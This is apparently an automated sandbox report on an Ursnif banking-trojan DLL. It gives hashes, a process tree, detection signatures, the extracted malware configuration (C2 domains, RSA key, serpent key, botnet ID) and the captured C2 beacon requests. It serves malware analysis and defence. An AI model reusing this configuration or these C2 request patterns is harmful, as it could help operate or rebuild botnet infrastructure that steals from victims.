Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 6yDD19jMIu.dll

Overview

General Information

Sample Name:6yDD19jMIu.dll
Analysis ID:500309
MD5:903cf677ba834a968b42bd71e4626a9d
SHA1:c751f3ab4612917d15967fc1f0591e674c2e56ca
SHA256:b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
Tags:BRTdllgeoGoziISFBITAUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3708 cmdline: loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6044 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5172 cmdline: rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6048 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 476 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4680 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 984 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 3056 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 872 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 28 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.loaddll32.exe.6ece0000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              4.3.rundll32.exe.342a31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                0.3.loaddll32.exe.71a31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.2.loaddll32.exe.750000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.2.rundll32.exe.12b0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 6yDD19jMIu.dllVirustotal: Detection: 9%Perma Link
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: areuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: breuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: 6yDD19jMIu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.152.242:443 -> 192.168.2.5:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.137.242:443 -> 192.168.2.5:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.5:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.5:49790 version: TLS 1.2
                      Source: 6yDD19jMIu.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.482429181.0000000004AE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.500262352.0000000004CE3000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdbQ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000013.00000003.499906922.0000000004E52000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516748528.00000000050B1000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdbE source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbI source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.482428909.00000000036AE000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.504088333.0000000000CFC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdbC source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.645023107.000000006ED5B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.645833298.000000006ED5B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbw source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.481849190.00000000036BA000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.503709261.0000000000D08000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.499811887.0000000004E42000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516677135.00000000050A4000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.499963350.0000000004E40000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516653357.00000000050A0000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb_ source: WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.480895631.00000000036B4000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.501149079.0000000000D02000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.499826747.0000000004E47000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.516703583.00000000050A7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.496211151.00000000056B1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.499748090.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.516407386.0000000004F91000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.98.208.66 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.9.178 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.161.50 40.97.161.50
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
